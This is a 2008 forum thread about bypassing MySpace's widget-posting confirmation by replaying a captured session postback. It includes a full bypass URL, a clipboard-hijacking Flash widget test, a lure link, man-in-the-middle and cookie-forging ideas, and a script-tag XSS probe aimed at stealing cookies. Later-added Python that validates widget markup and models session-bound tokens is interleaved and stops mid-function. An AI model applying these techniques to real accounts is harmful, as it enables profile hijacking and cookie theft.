digip Posted October 16, 2008

Disclaimer: This is for educational purposes only! Use at your own risk!!

I was on the Obama MySpace site today and looking at their Tax widget. I was looking at how they allow you to post it to your page, and what the mechanism was behind it. Using Wireshark I was able to discern that you can bypass the page that asks for your permission to post it to your page, and post it directly to your About Me section without it ever prompting you!

To test this, I added a nooblube Flash widget I created that hijacks the clipboard so anything you copy and paste comes up as www.nooblube.com

The implication of this is that you can essentially embed any Flash object into someone's page so long as two things are true.

1 - They have to actually be logged in to their MySpace account.
2 - They have to click the link you send them or direct them to. Whether it be in an email (using something like TinyURL to hide it), on any website, or a meta-refresh redirect to the link on some page you can lure them to, so they don't even have to actually click it to make it work.

Let's look at the process by which MySpace thinks it is keeping your pages secure while allowing you to add the widget to your page. The following code is a link provided by the Obama widget to add it to your page.
http://www.myspace.com/Modules/PostTo/Pages?l=3&u=&t=Obama+Tax+Calculator+Widget&c=%3cobject+type%3d%22application%2fx-shockwave-flash%22+data%3d%22http%3a%2f%2fwidgets.clearspring.com%2fo%2f48f203eebb67a86f%2f48f73997210d93f4%2f48f4f7ad9ac67fda%2ffecf3d5d%22+id%3d%22W48f203eebb67a86f48f73997210d93f4%22+width%3d%22190%22+height%3d%22510%22%3e%3cparam+name%3d%22movie%22+value%3d%22http%3a%2f%2fwidgets.clearspring.com%2fo%2f48f203eebb67a86f%2f48f73997210d93f4%2f48f4f7ad9ac67fda%2ffecf3d5d%22+%2f%3e%3cparam+name%3d%22wmode%22+value%3d%22transparent%22+%2f%3e%3cparam+name%3d%22allowNetworking%22+value%3d%22internal%22+%2f%3e%3cparam+name%3d%22allowScriptAccess%22+value%3d%22never%22+%2f%3e%3c%2fobject%3e

The following is the decoded link info:

http://www.myspace.com/Modules/PostTo/Pages?l=3&u=&t=Obama Tax Calculator Widget&c=<object type="application/x-shockwave-flash" data="http://widgets.clearspring.com/o/48f203eebb67a86f/48f73997210d93f4/48f4f7ad9ac67fda/fecf3d5d" id="W48f203eebb67a86f48f73997210d93f4" width="190" height="510"><param name="movie" value="http://widgets.clearspring.com/o/48f203eebb67a86f/48f73997210d93f4/48f4f7ad9ac67fda/fecf3d5d" /><param name="wmode" value="transparent" /><param name="allowNetworking" value="internal" /><param name="allowScriptAccess" value="never" /></object>

I used http://meyerweb.com/eric/tools/dencoder/ to decode the link. Now you can add whatever Flash link you want and change the information and, without even URL encoding it (which breaks it), copy and paste it into your browser. (NOTE: You must be logged in to see this working.) It then redirects you to a page asking you to confirm your request:

Before you can Post: "Obama Tax Calculator Widget" Please Confirm You Really Want to!

Once on this page, you can decide where on your page to post it. The default is the "About Me" box on your MySpace page. When you click Post, it then redirects you to your profile and you see the new widget show up in your page.
To remove it, just edit your profile and remove the code.

Now, in Wireshark (you had it running this whole time, right?) you will see the link above, and further down in the packet, under the referrer and cookies, you will see some data that begins with the line of __EVENTTARGET=&__EVENTARGUMENT=& Copy this whole section up to the part where it says http/1.1 (without the http/1.1). Take the original link above (the URL-encoded one or the decoded one), add a slash at the end of the URL, and paste that big long URL/form-encoded mess of a link to the end of it. Copy the whole thing and put it in your browser and it will BYPASS the need to confirm adding it to your page.

Now, I haven't tested this much further than on my own account, but I am going to play with this a bit more and see what happens when someone coming to my site clicks my nooblube link and if it shows up on their page. My next bit will be trying to get executable JavaScript into the page via a Flash widget this way, or just via the link bypassing method I just described.

If anyone feels confident enough to try my hack and see if it adds the nooblube widget to their page, feel free to log on to your MySpace account and then click this link to test my findings: http://www.twistedpairrecords.com/digip/MySpaceWidget.html

If for any reason it doesn't work, please let me know so I can see if it is somehow posting session data from my account (which I really don't care if you see it. Whatever...) specifically targeting only one account, or if it works for anyone who clicks it.

edit: Well, after testing it on another account, it looks like it may be tied together with something else, like cookie data, because as soon as I click the test link from another account, it redirects me to the MySpace front page. I think it probably only works on session data, but I can't confirm it at this point.
digip (Author) Posted October 16, 2008

One way I can see this taking effect is with a WiFi MITM attack: grabbing the user's session data, redirecting them to the prompt page for a widget, then again redirecting them to the auto-submit link after grabbing their respective data from Wireshark. It would need to be combined with some sort of ettercap filter that serves the user the auto-submit link once all the data is compiled into the link. Not an easy task, but I also think not impossible for someone to come up with an app to automate the process. Way over my head though. As of right now, I am only able to create this scenario under my own account.
m0u53 Posted October 16, 2008

That's awesome, great find... yet another MySpace exploit!!! yame!!!
digip (Author) Posted October 16, 2008

> That's awesome, great find... yet another MySpace exploit!!! yame!!!

I don't know how great of a find it is, but I can only get it to work manually, not for each visitor to the link. What happens is, if you try the link, it redirects you to the MySpace home page (if you are logged on). This is not what should happen; in my initial testing it posts the widget directly to the page. If you are not logged on and click the link, you get the login page, which requires you to log in to see anything. Once logged in, it asks you to "approve" the addition of the widget, so it's not working fully the way I can get it to work with my own session data, which I am also trying to figure out how to bypass.

Some of the data in the encoded form data is also present in the cookie data that MySpace sets, so it is somehow tied into this whole bit. I suspect it may be possible to set a cookie with the data in it, but since the cookie would be set from a site outside of MySpace's domain, it probably will never get called properly and won't work. If cookies could be forged and made to look as if they are legit from MySpace, I think it may then be possible to manipulate all the data and then bypass the widget prompt the way I can with my own account. Then just construct a page that automates all the cookie and form data forging and get someone to view that page.
DingleBerries Posted October 16, 2008

Giving a 3rd party application the ability to modify a user's private/personal account directly, even with permission, is an exploit in my opinion. The user should be the one copy/pasting the info, not the application. If there is an API available for this then it is a matter of time before there are numerous attacks made around this "feature". Also, that didn't work.
DingleBerries Posted October 16, 2008

So this is a "feature". All you have to do is craft the URL and it will change the object and title. I think I may have a new project. Thanks digip. I'm going to try and insert some XSS and what not.. Maybe steal some cookies?! If you want to go at this in tandem let me know.

The page accepts some encoded text.. example: Hex %44%69%6E%67%6C%65%42%65%72%72%69%65%73%20%72%20%69%6E%20%79%6F%75%72%20%62%61%73%65%73 is the same as "DingleBerries r in your bases".

Trying to insert an image gave me a "Terms of Service Violation" :/

Also.. You have a lot of room with the URL. Here is a template; this doesn't do anything.

myspace.com/Modules/PostTo/Pages/?l=3&u=&t=Test&c=<object><script a=">'>" SRC="test"></SCRIPT></object>

If I didn't have class in 15 mins I could prolly have some XSS going.. And since it's a myspace.com link it won't give you that "WARNING" page when a user clicks it.
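The two posts above (digip decoding the Obama widget link and swapping in his own .swf, DingleBerries probing the same `c` parameter with a `<script>` template) both come down to one fact: the PostTo link carries raw HTML in `c`, and whatever the server accepts there ends up on the profile. The Python below is an added example, not MySpace's code or either poster's: it decodes a PostTo link the way the meyerweb tool does, then vets the `c` markup against an allowlist policy. The policy itself is an assumption for illustration (only `<object>`/`<param>`, Flash type, `allowScriptAccess=never`, `allowNetworking=internal`, and a widget host allowlist containing only widgets.clearspring.com); the thread does not say what MySpace actually checked beyond refusing an `<img>`. The three links are copied from the posts.

```python
"""Decode a MySpace PostTo link and vet the widget markup it carries in ``c``.

Added example for this thread; not code from MySpace or from the posters.
The two links and the <script> template are copied from the thread above.
The allowlist policy is illustrative: the thread does not say what, if
anything, MySpace checked beyond rejecting an <img>.
"""
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlparse, urlsplit

# Link generated by the Obama widget (quoted in digip's first post).
OBAMA_LINK = (
    "http://www.myspace.com/Modules/PostTo/Pages?l=3&u=&t=Obama+Tax+Calculator+Widget"
    "&c=%3cobject+type%3d%22application%2fx-shockwave-flash%22+data%3d%22http%3a%2f%2f"
    "widgets.clearspring.com%2fo%2f48f203eebb67a86f%2f48f73997210d93f4%2f48f4f7ad9ac67fda"
    "%2ffecf3d5d%22+id%3d%22W48f203eebb67a86f48f73997210d93f4%22+width%3d%22190%22"
    "+height%3d%22510%22%3e%3cparam+name%3d%22movie%22+value%3d%22http%3a%2f%2f"
    "widgets.clearspring.com%2fo%2f48f203eebb67a86f%2f48f73997210d93f4%2f48f4f7ad9ac67fda"
    "%2ffecf3d5d%22+%2f%3e%3cparam+name%3d%22wmode%22+value%3d%22transparent%22+%2f%3e"
    "%3cparam+name%3d%22allowNetworking%22+value%3d%22internal%22+%2f%3e"
    "%3cparam+name%3d%22allowScriptAccess%22+value%3d%22never%22+%2f%3e%3c%2fobject%3e"
)

# First half of digip's link (before the appended form body), pointing at his own .swf.
DIGIP_LINK = (
    "http://www.myspace.com/Modules/PostTo/Pages/Default.aspx?l=3&u=&t=This%20is%20a%20Test"
    "&c=%3Cobject%20type=%22application/x-shockwave-flash%22%20data=%22http://www."
    "twistedpairrecords.com/digip/nooblubeclipjacker.swf%22%20id=%22W48f203eebb67a86f48f72ee0916689c0%22"
    "%20width=%22190%22%20height=%22510%22%3E%3Cparam%20name=%22movie%22%20value=%22http://www."
    "twistedpairrecords.com/digip/nooblubeclipjacker.swf%22%20/%3E%3Cparam%20name=%22wmode%22"
    "%20value=%22transparent%22%20/%3E%3Cparam%20name=%22allowNetworking%22%20value=%22internal%22"
    "%20/%3E%3Cparam%20name=%22allowScriptAccess%22%20value=%22never%22%20/%3E%3C/object%3E"
)

# DingleBerries' XSS probe, as posted.
XSS_TEMPLATE = "myspace.com/Modules/PostTo/Pages/?l=3&u=&t=Test&c=<object><script a=\">'>\" SRC=\"test\"></SCRIPT></object>"

# Assumed widget-host allowlist; the thread only shows this one host being legitimate.
ALLOWED_WIDGET_HOSTS = frozenset({"widgets.clearspring.com"})


class _WidgetParser(HTMLParser):
    """Record every tag seen plus the first <object>'s attributes and <param> pairs."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.object_attrs = None   # stays None until an <object> is seen
        self.params = {}

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        attrs = dict(attrs)
        if tag == "object" and self.object_attrs is None:
            self.object_attrs = attrs
        elif tag == "param" and "name" in attrs:
            self.params[attrs["name"]] = attrs.get("value") or ""

    # <param ... /> arrives as a start-end tag; treat it like a start tag.
    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)


def parse_postto_link(url):
    """Split a PostTo link into its query fields; ``c`` is the HTML MySpace embeds."""
    fields = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {name: values[0] for name, values in fields.items()}


def vet_widget_markup(markup, allowed_hosts=ALLOWED_WIDGET_HOSTS):
    """Return the list of policy violations in ``markup`` (empty means acceptable)."""
    p = _WidgetParser()
    p.feed(markup)
    p.close()
    problems = []
    extra = sorted(set(p.tags) - {"object", "param"})
    if extra:
        problems.append("disallowed tags: " + ", ".join(extra))
    if p.object_attrs is None:
        problems.append("no <object> element")
        return problems
    if p.object_attrs.get("type") != "application/x-shockwave-flash":
        problems.append("object type is not Flash")
    if (p.params.get("allowScriptAccess") or "").lower() != "never":
        problems.append("allowScriptAccess must be never")
    if (p.params.get("allowNetworking") or "").lower() != "internal":
        problems.append("allowNetworking must be internal")
    # Even a well-formed Flash object is only as trustworthy as the host serving the .swf.
    for label, src in (("data", p.object_attrs.get("data")), ("movie", p.params.get("movie"))):
        u = urlparse(src or "")
        if u.scheme not in ("http", "https") or u.hostname not in allowed_hosts:
            problems.append(f"{label} URL not on an allowlisted widget host: {src!r}")
    return problems


def vet_link(url):
    """Decode a PostTo link and vet its widget markup; returns (title, violations)."""
    fields = parse_postto_link(url)
    return fields.get("t", ""), vet_widget_markup(fields.get("c", ""))


if __name__ == "__main__":
    for name, link in (("Obama widget", OBAMA_LINK), ("digip's clipjacker", DIGIP_LINK),
                       ("DingleBerries' template", XSS_TEMPLATE)):
        title, problems = vet_link(link)
        print(f"{name} ({title!r}): {'ok' if not problems else problems}")
```

Run as-is, the Obama link passes, digip's variant fails only on the host allowlist (a well-formed Flash object pointing at a .swf on twistedpairrecords.com), and DingleBerries' template fails on the `<script>` tag before any of the object checks matter. The tag allowlist alone would not have stopped digip's clipboard hijacker; the host allowlist is the check that does.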
digip (Author) Posted October 16, 2008

To give you an idea of what I was using, here is the BIG long URL that bypasses the confirmation page. It won't work for anyone as it was tied to my current session when I was signed in, so it's expired at this point.

http://www.myspace.com/Modules/PostTo/Pages/Default.aspx?l=3&u=&t=This%20is%20a%20Test&c=%3Cobject%20type=%22application/x-shockwave-flash%22%20data=%22http://www.twistedpairrecords.com/digip/nooblubeclipjacker.swf%22%20id=%22W48f203eebb67a86f48f72ee0916689c0%22%20width=%22190%22%20height=%22510%22%3E%3Cparam%20name=%22movie%22%20value=%22http://www.twistedpairrecords.com/digip/nooblubeclipjacker.swf%22%20/%3E%3Cparam%20name=%22wmode%22%20value=%22transparent%22%20/%3E%3Cparam%20name=%22allowNetworking%22%20value=%22internal%22%20/%3E%3Cparam%20name=%22allowScriptAccess%22%20value=%22never%22%20/%3E%3C/object%3E/__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUKMTkyODUzMzI1Ng9kFgJmD2QWBGYPFgIeBFRleHRlZAIDD2QWAgIBEGRkFg4CBA8WAh8ABUA gPHNwYW4gY2xhc3M9J2NvbmZpcm1hdGlvbmdyZWV0aW5ndGl0bGUnPiJUaGlzIGlzIGEgVGVzdCI8L3N w YW4%2BZAIFDxYCHwAFKlRoaXMgaXMgaG93IGl0IHdpbGwgYXBwZWFyIG9uIHlvdXIgcHJvZmlsZWQCBg8WAh 8ABbQEPGIgaWQ9J3RpdGxlY29udGFpbmVyJz5UaGlzIGlzIGEgVGVzdDwvYj48cD48b2JqZWN0IHR5cG U 9ImFwcGxpY2F0aW9uL3gtc2hvY2t3YXZlLWZsYXNoIiBhbGxvd1NjcmlwdEFjY2Vzcz0ibmV2ZXIiIGF s bG93TmV0d29ya2luZz0iaW50ZXJuYWwiIGhlaWdodD0iNTEwIiB3aWR0aD0iMTkwIiBpZD0iVzQ4ZjIw M 2VlYmI2N2E4NmY0OGY3MmVlMDkxNjY4OWMwIiBkYXRhPSJodHRwOi8vd3d3LnR3aXN0ZWRwYWlycmVjb 3 Jkcy5jb20vZGlnaXAvbm9vYmx1YmVjbGlwamFja2VyLnN3ZiI%2BCiAgPHBhcmFtIG5hbWU9ImFsbG93U2NyaXB0QWNjZXNzIiB2YWx1ZT0ibmV2ZXIiIC8%2BCiAgPHBhcmFtIG5hbWU9ImFsbG93TmV0d29ya2luZyIgdmFsdWU9ImludGVybmFsIiAvPgogIDxwYX JhbSBuYW1lPSJtb3ZpZSIgdmFsdWU9Imh0dHA6Ly93d3cudHdpc3RlZHBhaXJyZWNvcmRzLmNvbS9kaW d pcC9ub29ibHViZWNsaXBqYWNrZXIuc3dmIiAvPgogIDxwYXJhbSBuYW1lPSJ3bW9kZSIgdmFsdWU9InR y 
YW5zcGFyZW50IiAvPgo8L29iamVjdD48L3A%2BPHAgaWQ9J2NvbW1lbnRzY29udGFpbmVyJz48L3A%2BZAIHD2QWAmYPZBYCAgEPZBYGAgUPEGQQFRsEbm9uZRNBcnQgYW5kIFBob3RvZ3JhcGh5CkF1dG9tb3 RpdmUIQmxvZ2dpbmcbRHJlYW1zIGFuZCB0aGUgU3VwZXJuYXR1cmFsGEZhc2hpb24sIFN0eWxlLCBTaG 9 wcGluZxRGb29kIGFuZCBSZXN0YXVyYW50cwdGcmllbmRzBUdhbWVzE0dvYWxzLCBQbGFucywgSG9wZXM T Sm9icywgV29yaywgQ2FyZWVycwRMaWZlF01vdmllcywgVFYsIENlbGVicml0aWVzBU11c2ljB015U3Bh Y 2URTmV3cyBhbmQgUG9saXRpY3MVUGFydGllcyBhbmQgTmlnaHRsaWZlEFBldHMgYW5kIEFuaW1hbHMHU G 9kY2FzdAtRdWl6L1N1cnZleRdSZWxpZ2lvbiBhbmQgUGhpbG9zb3BoeRlSb21hbmNlIGFuZCBSZWxhdG l vbnNoaXBzFlNjaG9vbCwgQ29sbGVnZSwgR3JlZWsGU3BvcnRzEVRyYXZlbCBhbmQgUGxhY2VzD1dlYiw g SFRNTCwgVGVjaBJXcml0aW5nIGFuZCBQb2V0cnkVGwEwATEBNAEyATYBMwE3ATgBOQIxMAIxMQIxMgIx N AIxNQIxNgIxNwIxOAIxOQIyNgIyMAIyMQIxMwIyMgIyMwIyNAE1AjI1FCsDG2dnZ2dnZ2dnZ2dnZ2dnZ 2 dnZ2dnZ2dnZ2dnZxYBZmQCCg8QZBAV4wEPTm9uZSwgb3Igb3RoZXI6DGFjY29tcGxpc2hlZAZhZG9yZW Q LYWR2ZW50dXJvdXMKYWdncmF2YXRlZAdhbW9yb3VzBmFtdXNlZAVhbmdyeQZhbmdzdHkIYW5pbWF0ZWQ H YW5ub3llZAdhbnhpb3VzCWFwYXRoZXRpYw1hcmd1bWVudGF0aXZlB2Fyb3VzZWQIYXJ0aXN0aWMHYXNo Y W1lZAVhd2FrZQhiZXRyYXllZAZiaXRjaHkEYmxhaAVibGFuawdibGVzc2VkCGJsaXNzZnVsCGJsdXN0Z X J5BWJvcmVkBmJvdW5jeQZicmVlenkHYnVsbGllZAZidW1tZWQEYnVzeQRjYWxtDGNhbnRhbmtlcm91cw l jYXRhbHl6ZWQIY2hlZXJmdWwFY2hpbGwHY2hpcHBlcgRjb2xkCmNvbXBsYWNlbnQJY29uZmlkZW50CGN v bmZ1c2VkDWNvbnRlbXBsYXRpdmUHY29udGVudAtjb29reS93YWNreQZjcmFua3kGY3JhcHB5BWNyYXp5 C GNyZWF0aXZlBWNydW5rB2NydXNoZWQIY3VsdHVyZWQHY3VyaW91cwdjeW5pY2FsCWRlcHJlc3NlZApkZ X Rlcm1pbmVkB2RldmlvdXMFZGlydHkMZGlzYXBwb2ludGVkCmRpc2NvbnRlbnQJZGlzZ3VzdGVkDGRpc3 R yYWN0YWJsZQpkaXN0cmF1Z2h0CmRpc3RyZXNzZWQFZGl0enkFZG9ya3kHZHJhaW5lZAVkcnVuawllY2N l bnRyaWMIZWNzdGF0aWMIZWxlY3RyaWMLZW1iYXJyYXNzZWQJZW5lcmdldGljC2VubGlnaHRlbmVkB2Vu c mFnZWQKZW50aHJhbGxlZAdlbnZpb3VzBGV2aWwJZXhhbmltYXRlB2V4Y2l0ZWQJZXhoYXVzdGVkBmV4b 3 RpYwhmYWJ1bG91cwpmYXNjaW5hdGVkCWZlcm1lbnRlZAZmbGlydHkHZm9jdXNlZAlmb3Jnb3R0ZW4GZn J pc2t5BmZyb2dneQpmcnVzdHJhdGVkBGZ1bGwHZ2FsbGFudAVnZWVreQVnaWRkeQZnaWdnbHkGZ2xvb21 5 
BGdvb2QIZ3JhdGVmdWwGZ3JvZ2d5BmdydW1weQZndWlsdHkIaGFuZHNvbWUFaGFwcHkEaGlnaAdob3Bl Z nVsBWhvcm55A2hvdAhodW5nb3ZlcgZodW5ncnkFaHlwZXILaW1hZ2luYXRpdmUJaW1wYXRpZW50Cmltc G VydmlvdXMKaW1wbGFjYWJsZQlpbXByZXNzZWQNaW5kZXNjcmliYWJsZQtpbmRpZmZlcmVudAlpbmRpZ2 5 hbnQKaW5mdXJpYXRlZAtpbnF1aXNpdGl2ZQhpbnNwaXJlZA1pbnN1Ym9yZGluYXRlB2ludGVuc2ULaW5 0 aW1pZGF0ZWQFaXJhdGUJaXJyaXRhdGVkB2plYWxvdXMEamVkaQVqb2xseQhqdWJpbGFudAhrbmlnaHRl Z ARsYXp5CWxldGhhcmdpYwhsaXN0bGVzcwZsb25lbHkFbG92ZWQIbHVtaW5vdXMDbWFkCm1lbGFuY2hvb H kGbWVsbG93C21pc2NoaWV2b3VzCW1pc2VyYWJsZQVtb29keQZtb3Jvc2UHbmF1Z2h0eQluYXVzZWF0ZW Q JbmVnbGVjdGVkBW5lcmR5B25lcnZvdXMFbmluamEJbm9zdGFsZ2ljBG51bWIKb2JzZXF1aW91cwRva2F 5 Cm9wdGltaXN0aWMOb3ZlcnN0aW11bGF0ZWQIcGVhY2VmdWwGcGVldmVkB3BlbnNpdmULcGVzc2ltaXN0 a WMGcGlyYXRlCnBpc3NlZCBvZmYFcGlzc3kGcGxheWVkB3BsZWFzZWQGcHJldHR5CnByb2R1Y3RpdmUKc H VnbmFjaW91cwRwdXJlBXF1aWV0CHF1aXhvdGljCnJlYmVsbGlvdXMJcmVjdW1iZW50CXJlZnJlc2hlZA h yZWplY3RlZAtyZWp1dmVuYXRlZAdyZWxheGVkCHJlbGlldmVkCHJlc3RsZXNzBnJvY2tpbghyb21hbnR p YwZydXNoZWQDc2FkBXNhc3N5CXNhdGlzZmllZAZzYXZhZ2UGc2NhcmVkCXNlbGVjdGl2ZQdzaG9ja2Vk B HNpY2sFc2lsbHkGc2xlZXB5BXNtYXJ0B3NtaXR0ZW4Gc25lYWt5BnNuZWV6eQRzb3JlB3N0YWxrZWQGc 3 Rva2VkCHN0cmVzc2VkBnN0cm9uZwlzdXJwcmlzZWQGc3dlYXR5C3N5bXBhdGhldGljCXRhbGthdGl2ZQ Z 0ZXN0ZWQIdGhhbmtmdWwHdGhpcnN0eQp0aG91Z2h0ZnVsBXRpcmVkB3RvdWNoZWQKdHJpdW1waGFudA1 1 bmNvbWZvcnRhYmxlD3VuZGVyc3RpbXVsYXRlZAR1c2VkCXZhbGlkYXRlZAh2ZWhlbWVudAV2ZXhlZAd2 a WJyYW50CHZpcmdpbmFsBXZpdGFsCnZvbHVtaW5vdXMGd2FudGVkBHdhcm0Fd2VpcmQHd29ya2luZwd3b 3 JyaWVkFeMBATACOTADMTM1AzEzNgExAzEzNwI0NAEyAzEzOAMxMzkBMwE0AzExNAMxNDADMTQxAzEwOA M xNDICODcDMTQzAzExMAI5MgMxMTMDMTQ0AzE0NQMxNDYBNQI1OQMxNDcDMTQ4AzE0OQI5MQI2OAMxNTA D MTUxAzEyNQMxNTICOTkCODQCNjMDMTUzATYDMTAxAjY0AzE1NAE4ATcDMTA2AzEwNwMxNTUDMTI5AzE1 N gI1NgMxMDQBOQI0NQMxMzADMTE5AjU1AjEwAzE1NwMxNTgDMTU5AzEyNwIzNQMxMTUCNDACMzQDMTYwA j k4AzE2MQI3OQIxMQMxNjICMTICMTMCODADMTYzAjc4AjQxAjE0AzE2NAMxNjUDMTY2AzE2NwI2NwMxNj g DMTY5AzE3MAMxNzECNDcCOTMDMTcyAzEwMwMxMjACNzICMzgDMTI2AzEzMgI1MQI5NQMxMTEDMTczAjE 1 
AjE2AjQzAjE3AjgzAzE3NAIxOAI1MgMxNzUDMTc2AzE3NwMxNzgDMTE2AjQ4AjY1AzE3OQIxOQMxODAD M TgxAzE4MgMxODMDMTI4AjIwAzExMgMxMzMDMTg0AzE4NQIyMQMxODYCMzMCNzUCNzYCMjICODYDMTg3A z E4OAIzOQI1NwIzNgMxODkCMjMCMzcDMTE3Ajk3AzE5MAMxMDIDMTM0AzE5MQI2MAMxMjQDMTkyAjYxAj c wAzE5MwI1OAMxOTQCNzMCNzEDMTk1AjI0AzE5NgMxOTcDMTA5AzE5OAI4OQMxOTkDMjAwAzIwMQMxMDU D MjAyAjc3AjY5AzEyMwI2MgI1MwI0MgI1NAMyMDMDMjA0AzEwMAIyNQMyMDUCMjYDMTE4AjQ2AzIwNgMx M jICODICNjYCNDkDMjA3AzIwOAMyMDkDMjEwAjI3AzIxMQMyMTICMjgDMjEzAzEyMQMyMTQCODEDMjE1A z IxNgMxMzECMjkCMzACMzECMzIDMjE3Ajc0AzIxOAMyMTkDMjIwAzIyMQMyMjIDMjIzAzIyNAMyMjUDMj I 2AzIyNwMyMjgCOTYCODgCODUUKwPjAWdnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2d n Z2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dn Z 2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ 2 dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2 d nZ2dnZ2dnFgFmZAIQDxBkEBUEB1B1YmxpYyAGRGlhcnkgCEZyaWVuZHMgE1ByZWZlcnJlZCZuYnNwO0x p c3QVBAEwATEBMgEzFCsDBGdnZ2cWAWZkAggPEGQQFQoMUG9zdCBUbyBCbG9nEFBvc3QgdG8gQnVsbGV0 a W4QUG9zdCB0byBBYm91dCBNZRhQb3N0IHRvIEknZCBMaWtlIHRvIE1lZXQRUG9zdCB0byBJbnRlcmVzd H MNUG9zdCB0byBNdXNpYw5Qb3N0IHRvIE1vdmllcxJQb3N0IHRvIFRlbGV2aXNpb24NUG9zdCB0byBCb2 9 rcw5Qb3N0IHRvIEhlcm9lcxUKATEBMgEzATQBNQE2ATcBOAE5AjEwFCsDCmdnZ2dnZ2dnZ2cWAQICZAI J Dw8WAh8ABQdQb3N0IEl0ZGQCCg8WAh4HVmlzaWJsZWdkGAEFGmN0bDAwJGNwTWFpbiRFZGl0TXVsdGlW a WV3Dw9kAgJk&hashChecker=MIGnBgorBgEEAYI3WAOSoIGYMIGVBgorBgEEAYI3WAMBoIGGMIGDAgMCAAECAmYD AgIAwAQIGUFFr8gZOiAEEBurrMcQGLXN9VpxSpybgZ0EWFo2i2uKZzAhfnh5cgPYQTK85zxGubs%252fvmcZTqSDn9BvPgCEaZrMfvPpA7dIfTKCbAZk7rxxwEgO7m0no5R%252fr%252bHZKSgCxuKU1CLrX0apOyRFPF1K16lz6yw%253d&ctl00%24cpMain%24AboutMeEdit%24tbxSubject=This+is+a+Test&ctl00%24cpMain%24AboutMeEdit%24tbxBody=&ctl00%24cpMain%24AboutMeEdit%24hdnContent=Jmx0O29iamVjdCB0eXBlPSZxdW90O2FwcGxpY2F0aW9uL3gtc2hvY2t3YXZlLWZsYXN oJnF1b3Q7IGRhdGE9JnF1b3Q7aHR0cDovL3d3dy50d2lzdGVkcGFpcnJlY29yZHMuY29tL2RpZ2lwL25 v 
b2JsdWJlY2xpcGphY2tlci5zd2YmcXVvdDsgaWQ9JnF1b3Q7VzQ4ZjIwM2VlYmI2N2E4NmY0OGY3MmVl M DkxNjY4OWMwJnF1b3Q7IHdpZHRoPSZxdW90OzE5MCZxdW90OyBoZWlnaHQ9JnF1b3Q7NTEwJnF1b3Q7J m d0OyZsdDtwYXJhbSBuYW1lPSZxdW90O21vdmllJnF1b3Q7IHZhbHVlPSZxdW90O2h0dHA6Ly93d3cudH d pc3RlZHBhaXJyZWNvcmRzLmNvbS9kaWdpcC9ub29ibHViZWNsaXBqYWNrZXIuc3dmJnF1b3Q7IC8mZ3Q 7 Jmx0O3BhcmFtIG5hbWU9JnF1b3Q7d21vZGUmcXVvdDsgdmFsdWU9JnF1b3Q7dHJhbnNwYXJlbnQmcXVv d DsgLyZndDsmbHQ7cGFyYW0gbmFtZT0mcXVvdDthbGxvd05ldHdvcmtpbmcmcXVvdDsgdmFsdWU9JnF1b 3 Q7aW50ZXJuYWwmcXVvdDsgLyZndDsmbHQ7cGFyYW0gbmFtZT0mcXVvdDthbGxvd1NjcmlwdEFjY2Vzcy Z xdW90OyB2YWx1ZT0mcXVvdDtuZXZlciZxdW90OyAvJmd0OyZsdDsvb2JqZWN0Jmd0Ow%3D%3D&ctl00%24cpMain%24AboutMeEdit%24hdnUrl=&ctl00%24cpMain%24ddlPostType=3&ctl00%24cpMain%24btnPostIt=Post+It

Somewhere in there is data that is also in the cookie, so I think it references session data while posting the info. This way it expires: if you log out and log back in, the trick doesn't work and only redirects you to the main page. What is weird, though, is if you follow the link when logged out, then log in, as soon as you log in you get a message asking you to approve the widget. So there may be a possible way to do this if we can decode their form output between __EVENTTARGET and PostIt=Post+It
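The symptoms digip reports in this post and the one before it (the captured postback replays in his own session, another account gets bounced to the front page, and some of the form fields match values in his cookies) are exactly what a confirmation form with a session-bound anti-replay token looks like from the outside. The Python below is an added model written for this thread, not MySpace's code: the field names are the ones in the captured body above, but the values, the cookie session ids and the HMAC construction standing in for `hashChecker` are all constructed assumptions (the thread never decodes the real token). It also shows the alternative digip was hoping for: a token that is not bound to the cookie, which is what would let one captured link post to every logged-in visitor's profile.

```python
"""Why a captured PostTo confirmation only replays inside the session that produced it.

Added model for this thread, not MySpace's code: the field names are the ones in
the captured postback above, but the values, the session ids and the HMAC-based
hashChecker are constructed stand-ins. The real hashChecker format is unknown.
"""
import hashlib
import hmac
from urllib.parse import parse_qs, urlencode

SERVER_KEY = b"constructed-server-side-secret"  # constructed for the example

# Constructed stand-in for the decoded hdnContent field (the widget markup being posted).
NOOBLUBE_WIDGET = '<object data="http://www.twistedpairrecords.com/digip/nooblubeclipjacker.swf"></object>'


def issue_token(session_id, post_type, hdn_content):
    """Token the confirmation page embeds as hashChecker.

    Binding it to the session id is what makes a captured postback useless from
    another account; pass session_id="" to model a token with no such binding.
    """
    msg = "|".join((session_id, post_type, hdn_content)).encode()
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()


def confirmation_postback(token_session_id, hdn_content, post_type="3", subject="This is a Test"):
    """Form body the 'Please Confirm' page would submit when Post It is clicked.

    The same string, appended to the PostTo URL as digip did, is what the server
    sees in the query string; parse_qs reads both forms identically.
    """
    fields = {
        "__EVENTTARGET": "", "__EVENTARGUMENT": "", "__LASTFOCUS": "",
        "__VIEWSTATE": "constructed-viewstate",
        "hashChecker": issue_token(token_session_id, post_type, hdn_content),
        "ctl00$cpMain$AboutMeEdit$tbxSubject": subject,
        "ctl00$cpMain$AboutMeEdit$tbxBody": "",
        "ctl00$cpMain$AboutMeEdit$hdnContent": hdn_content,
        "ctl00$cpMain$AboutMeEdit$hdnUrl": "",
        "ctl00$cpMain$ddlPostType": post_type,
        "ctl00$cpMain$btnPostIt": "Post It",
    }
    return urlencode(fields)


def handle_post_it(encoded_fields, cookie_session_id, bind_to_session=True):
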